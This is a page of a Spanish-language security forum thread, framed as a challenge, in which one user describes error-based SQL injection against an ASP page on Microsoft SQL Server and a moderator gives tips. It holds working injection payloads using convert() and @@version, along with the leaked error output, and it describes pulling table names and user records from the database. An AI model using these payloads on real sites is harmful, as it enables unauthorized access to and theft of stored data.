elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  [SQL INJECTION] ¿Me ayudas en un reto? (Abierto)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] 3 Ir Abajo Respuesta Imprimir
Autor Tema: [SQL INJECTION] ¿Me ayudas en un reto? (Abierto)  (Leído 16,266 veces)
ZaPa

Desconectado Desconectado

Mensajes: 36


Ver Perfil
Re: [SQL INJECTION] ¿Me ayudas en un reto? (Abierto)
« Respuesta #10 en: 18 Marzo 2010, 00:03 am »

Hola de nuevo y gracias por tu respuesta shellroot.

Ya entendí lo que dijiste en el anterior mensaje....

Claro,con ese error me soltó lo que queria saber,que es el nombre de la tabla (con el que estamos trabajando) y el campo, pero en esa tabla no ahi ningun dato valioso, me gustaria saber si puedo acceder desde ahi a otras tablas...

¿Es posible?

¿como podria trabajar con otras tablas dispnibles en la db?

Muchisimas gracias man :)
En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: [SQL INJECTION] ¿Me ayudas en un reto? (Abierto)
« Respuesta #11 en: 18 Marzo 2010, 00:07 am »

Nunca me llamo la antencion ese tipo de tecnica, es muy dificil y gastaria mucho tiempo, para al final depronto no conseguir nada. xD
Supongo que seria como una Blind SQL, no sé...
En línea

Te vendería mi talento por poder dormir tranquilo.
ZaPa

Desconectado Desconectado

Mensajes: 36


Ver Perfil
Re: [SQL INJECTION] ¿Me ayudas en un reto? (Abierto)
« Respuesta #12 en: 18 Marzo 2010, 00:12 am »

Pero...¿es muy dificil? pero si es una sql inyection normal,no? lo único que ocurre es que no nos enfrentamos con un formulario, es lo único que veo diferente.


Lo único que quiero saber es eso, si podria llegar a listar las tablas, osea, que no tenga que ejecutar sentencias si o si en la tabla que estamos ejecutando, que pueda trabajar con otras tablas aparte de la que esta trabajando la variable donde esta el sql inyection. ¿se entiende?


Un saludo y muchisimas gracias alex@shellroot .
En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: [SQL INJECTION] ¿Me ayudas en un reto? (Abierto)
« Respuesta #13 en: 18 Marzo 2010, 00:23 am »

Se entiende correctamente, pero lo dudo bastante, dentro de MySQL seh se puede hacer. Pero dentro de este tipo de inyeccion se trabaja bajo MSSQL, si te sirve de algo, esta consulta lista todas las tablas de una base de datos.
Código
  1. USE Base_de_Datos SELECT * FROM Information_Schema.TABLES

PD: Mejor espera que algun usuario de alto nivel (WHK, sirdarckcat, entre otros), respondan mejor la pregunta.
En línea

Te vendería mi talento por poder dormir tranquilo.
ZaPa

Desconectado Desconectado

Mensajes: 36


Ver Perfil
Re: [SQL INJECTION] ¿Me ayudas en un reto? (Abierto)
« Respuesta #14 en: 18 Marzo 2010, 00:40 am »

El problema principal de esto es que me da error de sintáxis y no se porque...si yo añado esta sentencia, me da error de sintaxis:


Código:
http://www.paginaweb.com/productos.asp?variable=38715333 AND Select * from productos

Con esta nueva inyección (Select * from productos) me da error de sintáxis:

Código:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Sintaxis incorrecta cerca de la palabra clave 'SELECT'.

/cgi-bin/datos.asp, línea 25


¿Algo hago mal?

Muchas gracias de nuevo.
En línea

ZaPa

Desconectado Desconectado

Mensajes: 36


Ver Perfil
Re: [SQL INJECTION] (TRANSACT-SQL) ¿Me ayudas en un reto? (Abierto)
« Respuesta #15 en: 18 Marzo 2010, 00:56 am »

Hola...

Conseguí ejecutar la sentencia 'SELECT @@version' y ver información del sistema...

Pero he tenido que hacer una cosa, y no entiendo el PORQUE funciona, aver si me lo podeis explicar:

La inyección ha sido la siguiente:

Código:
AND (SELECT @@version)<=1 --

Y como se puede observar, despues de la inyección, he tenido que añadir el menor o igual que 1 (<=1) y asi si funciona, y se ejecuta la sentencia devolviendo lo siguiente:

Código:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Error de sintaxis al convertir el valor nvarchar 'Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.2 (Build 3790: Service Pack 2) ' para una columna de tipo de datos int.


Por lo que se ve, funcionaaa...

Ahora no entiendo 2 cosas, aver si me podeis explicar....

1 - ¿Porque sin parantesis la sentencia no funciona?
2 - ¿Porque tengo que añadir esa comparación númerica?

¿Alguien me puede aclarar estos 2 puntos, se lo agradeceria muchisimo.

Un saludo.
« Última modificación: 18 Marzo 2010, 13:00 pm por ZaPa » En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: [SQL INJECTION] ¿Me ayudas en un reto? (Abierto)
« Respuesta #16 en: 18 Marzo 2010, 02:21 am »

xD, creo que no entendiste lo que te dijé.

Nunca dijé que con esa sentencia podrias listar todas las tablas de esa base de datos, solo dije que si te servia de algo, asi se podria listar las tablas de una base de datos en MSSQL. Es decir, dentro del IDE! No dentro de la inyección. Además, no creo que sea así de simple al ejecutar una sentencia SQL y se ejecute en el servidor, más bien, creo que debes de investigar en que consiste la Blind SQL y entenderas un poco lo que podrias hacer.

Y repito lo mismo espera que algun usuario de alto nivel (WHK, sirdarckcat, entre otros), respondan mejor la pregunta.
En línea

Te vendería mi talento por poder dormir tranquilo.
ZaPa

Desconectado Desconectado

Mensajes: 36


Ver Perfil
Re: [SQL INJECTION] ¿Me ayudas en un reto? (Abierto)
« Respuesta #17 en: 18 Marzo 2010, 03:10 am »

Hola de nuevo y gracias por responder otra vez man.

Traigo novedades frescas a la mesa jeje....

Con la función convert() he podido obtener algunos datos de los productos que ahi en la db, por ejemplo haciendo:

Código:
variable=convert(int,(select+productos.referencia))

Me responde una referencia del 1º articulo de la base de datos, respuesta:

Código:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Error de sintaxis al convertir el valor nvarchar 'A35678956' para una columna de tipo de datos int.

/cgi-bin/datos.asp, línea 25

Como podeis ver, me ha devuelto la referencia: 'A35678956'..

He estado probando combinaciones con nombre de tablas (donde pudiera estar los datos de administrador). He probado un monton de nombres de tablas para ver si encontraba esa info, pero ninguna concuerda ccon la tabla donde se almacenan los datos valiosos..

Sigo esperando a que alguien me diga si puedo listar todas las tablas de la base de datos, o algo similar.

Muchisimas gracias.
Saludos.
En línea

ZaPa

Desconectado Desconectado

Mensajes: 36


Ver Perfil
Re: [SQL INJECTION] ¿Me ayudas en un reto? (Abierto)
« Respuesta #18 en: 18 Marzo 2010, 12:22 pm »

Hola de nuevo a todos.

Ya he conseguido saber las tablas que ahi en la base de datos y demas, incluso estoy accediendo a los valores de cada columna, pero....... realmente no entiendo esto, os explico:

Anteriormente con injecciones simples del tipo ("Select * from TABLA) y demás, me daba error de sintáxis, buscando,buscando, me he dado cuenta que para las páginas asp utilizan la función convert() para obtenre datos de la base de datos......

Por ej:

Código:

 http://www.paginaweb.com/datos.asp?variable=and 1=convert(int,(select top 1 Usuario from usuarios))--

Con esto conseguiriamos mostrar el 1º campo de la tabla usuarios y columna usuario.


¿Porque esto funciona asi, es decir, porque tengo que utilizar convert() y lo que es la sintáxis de las llamadas sql tampoco son igual que las de php, es asi para MSSQL SERVER?

Un saludo.
En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: [SQL INJECTION] ¿Me ayudas en un reto? (Abierto)
« Respuesta #19 en: 18 Marzo 2010, 18:03 pm »

Lo de convert(), supongo que es para setear el tipo de datos devuelvo por el query. Ahora lo segundo que preguntas no lo entendí bien, pero supongo que preguntas, porque no te funciono la sentencia:
Código
  1. SELECT * FROM Usuarios
Tuviste que usar el query:
Código
  1. SELECT TOP 1 Usuario FROM usuarios
Así como en la Inyección en MySQL, sebes de sacar dato por dato, es decir, campo por campo, registro por registro. Tambien debe de ser igual en MSSQL, no podeis mostrar todos los datos inmediatamente, tenes que irlo sacando por partes.
En línea

Te vendería mi talento por poder dormir tranquilo.
Páginas: 1 [2] 3 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[RETO ABIERTO] Cambio de base ~
Java
Dnk! 5 5,869 Último mensaje 2 Diciembre 2010, 20:28 pm
por Dnk!
[RETO] Sql injection
Nivel Web
cur3n79 3 4,428 Último mensaje 12 Febrero 2011, 14:24 pm
por xassiz~
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines